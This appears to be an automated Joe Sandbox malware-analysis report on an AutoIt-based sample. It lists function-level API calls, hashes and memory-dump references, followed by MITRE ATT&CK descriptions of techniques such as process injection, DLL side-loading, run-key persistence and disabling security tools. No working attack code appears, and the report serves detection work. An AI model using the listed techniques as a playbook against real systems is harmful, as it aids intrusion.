SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00241D4C

Strings

ListBox, xrefs: 00241D16
ComboBox, xrefs: 00241CEB

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 7632a41a73e40482e749d772a28e284a6ce72a5569381a6ddf040f06f98dea5e
Instruction ID: 5402f0d210e0ae6b6959414530c3dc8d220c508f497a880a48beaca9eb69241c
Opcode Fuzzy Hash: 7632a41a73e40482e749d772a28e284a6ce72a5569381a6ddf040f06f98dea5e
Instruction Fuzzy Hash: 11012871A20218AB8B1CFFA0CC51DFE7368FF57350B10090AF822572D1EB3059688660

Function 00241BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

Part of subcall function 00243CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00243CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00241C46

Strings

ListBox, xrefs: 00241C10
ComboBox, xrefs: 00241BE5

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 20f41d9ffaae27b08ee6802d2024afd2847392415e73efa206c656c10b89cfe7
Instruction ID: 4076a9702c089cacb07be823f718416a197dad83a90c9b662d64254d0af6caef
Opcode Fuzzy Hash: 20f41d9ffaae27b08ee6802d2024afd2847392415e73efa206c656c10b89cfe7
Instruction Fuzzy Hash: 7D01A7756A111967CB1CFBA0DD91EFF77A89F22340F14041AE80667281EA609E7896B2

Function 00241C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

Part of subcall function 00243CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00243CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 00241CC8

Strings

ListBox, xrefs: 00241C94
ComboBox, xrefs: 00241C69

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: e71eb9618dd6c3f7ff2de06772febbe6411e6a28f2489320397b476519f3ea62
Instruction ID: fb3592076d08b7154b54af9adc785d352ed0c00fd94a6e9f53d7a7a0c6f12bb2
Opcode Fuzzy Hash: e71eb9618dd6c3f7ff2de06772febbe6411e6a28f2489320397b476519f3ea62
Instruction Fuzzy Hash: BC01DB716A011967CB18FBA1CE81EFF73AC9B22340F540416F80277281FA609F78D672

Function 001FA4D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 001FA529

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

Strings

3y#, xrefs: 001FA545, 001FA54D, 001FA552
,%+, xrefs: 001FA509

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Init_thread_footer_wcslen
String ID: ,%+$3y#
API String ID: 2551934079-568776299
Opcode ID: 695a6464267280cad084ad1882d9ca6599034005ac26c5155e28e2cc9b0fd2f2
Instruction ID: d39666769019047aff13c221d6583e705df655a2fce11e57fd0d035b9e208bbb
Opcode Fuzzy Hash: 695a6464267280cad084ad1882d9ca6599034005ac26c5155e28e2cc9b0fd2f2
Instruction Fuzzy Hash: B2014271A007189BC618F368EC4BABD33188F05720FD00128FA0A1B2D3EF149D068A97

Function 00241D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

Part of subcall function 00243CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00243CCA

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00241DD3

Strings

ListBox, xrefs: 00241DA0
ComboBox, xrefs: 00241D75

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 6721254ff42cd737f4df5808f5dc0c50b6139bcd302779d9a8f5000b1dfdd97f
Instruction ID: 8587bc3e27cc27b95fb6514e2955b2d5e5f3708acf01c0ea6d4e05913d831e20
Opcode Fuzzy Hash: 6721254ff42cd737f4df5808f5dc0c50b6139bcd302779d9a8f5000b1dfdd97f
Instruction Fuzzy Hash: CEF0F971F60618A7C71CF7A4CC91FFF7368AF12340F140D19F822672C1EB6059688660

Function 00278172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,002B3018,002B305C), ref: 002781BF
CloseHandle.KERNEL32 ref: 002781D1

Strings

\0+, xrefs: 0027818A

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: \0+
API String ID: 3712363035-3911041397
Opcode ID: 9533d0e8f7e945abebf067da196e6897f92dcee1a736564fd76e0a70a6a21d27
Instruction ID: d837f2bd9ebe6dd81bfda9e84093b6b1f1857c72b33999a6fc6edbc18caf8b45
Opcode Fuzzy Hash: 9533d0e8f7e945abebf067da196e6897f92dcee1a736564fd76e0a70a6a21d27
Instruction Fuzzy Hash: 7AF05EB2650300BBE320BB61BC4DFB73A5CDF04750F004865BB0CD51A2D675AA6487B8

Function 0026747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00267493
_wcslen.LIBCMT ref: 002674B9

Strings

3, 3, 16, 1, xrefs: 00267483

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: 6c3000541e03b02903cc892539bfd1b7af90584a14fc97aae9284f60ee3296ad
Instruction ID: d0831741815558ea428f1d596a7e5b29aadfefd69a5af1cf6a5c49e342666bf7
Opcode Fuzzy Hash: 6c3000541e03b02903cc892539bfd1b7af90584a14fc97aae9284f60ee3296ad
Instruction Fuzzy Hash: 8FE02B4623536111D3312679BCC5A7F5699DFC6B50710183BFE81C22A7EE948DF193A0

Function 00240B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00240B23

Strings

AutoIt, xrefs: 00240B17
Error allocating memory., xrefs: 00240B1C

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: d4d08e9dd1cf6faa9f5472efea6eb887ee30d9bd6bba8d019573f9a5f565ffaf
Instruction ID: 24db7e16eaafc556ff15176d1ae5a22cbfe1f57fb8107fc87e93f26dffe4cb07
Opcode Fuzzy Hash: d4d08e9dd1cf6faa9f5472efea6eb887ee30d9bd6bba8d019573f9a5f565ffaf
Instruction Fuzzy Hash: D5E0D83225431866D31437A47C43F9A7A848F16B64F20442EF74C594C38FE124B006ED

Function 00200D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 001FF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00200D71,?,?,?,001E100A), ref: 001FF7CE

IsDebuggerPresent.KERNEL32(?,?,?,001E100A), ref: 00200D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,001E100A), ref: 00200D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00200D7F

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 25437c073cc533e09e0b6cd18fa5a3fef4c0c75a7d8bc7ced8ccc20effea5ba5
Instruction ID: 42159df071093d21d290142bf3444fbdbac4bc5b191576d5655e33c33a8fd9c0
Opcode Fuzzy Hash: 25437c073cc533e09e0b6cd18fa5a3fef4c0c75a7d8bc7ced8ccc20effea5ba5
Instruction Fuzzy Hash: 2EE092702107518BE3709FB8E9483467BE0EF04740F008A2DE88AC7696EBF0E4948BA1

Function 001FE398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 001FE3D5

Strings

8%+, xrefs: 001FE3CA
0%+, xrefs: 001FE3B5

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Init_thread_footer
String ID: 0%+$8%+
API String ID: 1385522511-2501399898
Opcode ID: 68168e0c4c4df10b89ecf0b93b9acfdb528f7e4b7d0345d4b5e09a0903dd94a5
Instruction ID: c38f8cd36fc4fee6b24cc61cd9ea1487bd19dde2a0fd70aa31760ed08d93b824
Opcode Fuzzy Hash: 68168e0c4c4df10b89ecf0b93b9acfdb528f7e4b7d0345d4b5e09a0903dd94a5
Instruction Fuzzy Hash: 82E08631424B18CBDB3C9718BAADAE83395FB05720B919665E613871E29B3128458B65

Function 00253017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0025302F
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00253044

Strings

aut, xrefs: 00253038

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 81e901b88160d142ec5499d4ebc4b5508689ceeb9c36b38e8be7472ce8a7f62f
Instruction ID: 759788918ec8daf6b5c21eb9aff527ad330a4e41d14e41fc96fa74be768634b3
Opcode Fuzzy Hash: 81e901b88160d142ec5499d4ebc4b5508689ceeb9c36b38e8be7472ce8a7f62f
Instruction Fuzzy Hash: B6D05E7250032867DB20A7A4AC0EFCB3A6CDB05750F0002A1BA59E2092DEB09A84CBD0

Function 0023D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0023D220

Strings

%.3d, xrefs: 0023D22B
X64, xrefs: 0023D2A8

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: b4a4f1ebff8e5f762903b60d093c3c8177c673bbe3137c5550ea26e7d0340638
Instruction ID: fd524dc898b57371361d265229d0ddcc074f4a173a25ca2264552936feeaa2b9
Opcode Fuzzy Hash: b4a4f1ebff8e5f762903b60d093c3c8177c673bbe3137c5550ea26e7d0340638
Instruction Fuzzy Hash: 08D012F1828118EACB9096E0FC498BBB37CAB19301F608456FD06D1042DB74D5686761

Function 00272322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0027232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0027233F

Part of subcall function 0024E97B: Sleep.KERNEL32 ref: 0024E9F3

Strings

Shell_TrayWnd, xrefs: 00272325

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: b05aa102759f1d957fb2fcc0cffaf73722b953ec810c04af0a046cea8d399206
Instruction ID: cc147a1bf6edc5f6f87da179ff5367cad6b195e95d856fef8a8ffb7a7757931d
Opcode Fuzzy Hash: b05aa102759f1d957fb2fcc0cffaf73722b953ec810c04af0a046cea8d399206
Instruction Fuzzy Hash: 5ED012763E4310B7E66CB770EC4FFC6BA18AB41B10F15491AB749AA1D0CAF0A851CE54

Function 00272356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0027236C
PostMessageW.USER32(00000000), ref: 00272373

Part of subcall function 0024E97B: Sleep.KERNEL32 ref: 0024E9F3

Strings

Shell_TrayWnd, xrefs: 00272365

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 28794e811cb8c1c96f5635390df308785d9822c79dc090dab6c99dde04781900
Instruction ID: c163bdb2e08e81829b22dcae6b6e572360e96ce118ada1697acfec5ae01e888a
Opcode Fuzzy Hash: 28794e811cb8c1c96f5635390df308785d9822c79dc090dab6c99dde04781900
Instruction Fuzzy Hash: 02D0C9723E1310BBE668A770AC4FFC6A618AB45B10F55491AB649AA1D0CAA0A8518A54

Function 0021BDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0021BE93
GetLastError.KERNEL32 ref: 0021BEA1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0021BEFC

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 0d8e312cea00e949de70bffccfc560372b047e4ce9a1d0763283dc1b65ff56ff
Instruction ID: 1b52958f37898a862ad404a2219a83e362f0d227dcdc032bcb98c67e2252a9fc
Opcode Fuzzy Hash: 0d8e312cea00e949de70bffccfc560372b047e4ce9a1d0763283dc1b65ff56ff
Instruction Fuzzy Hash: 5741C435624207AFCF228F64CC44AEA7BF5AF61320F244169F959975E1DB308DA2CB50

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

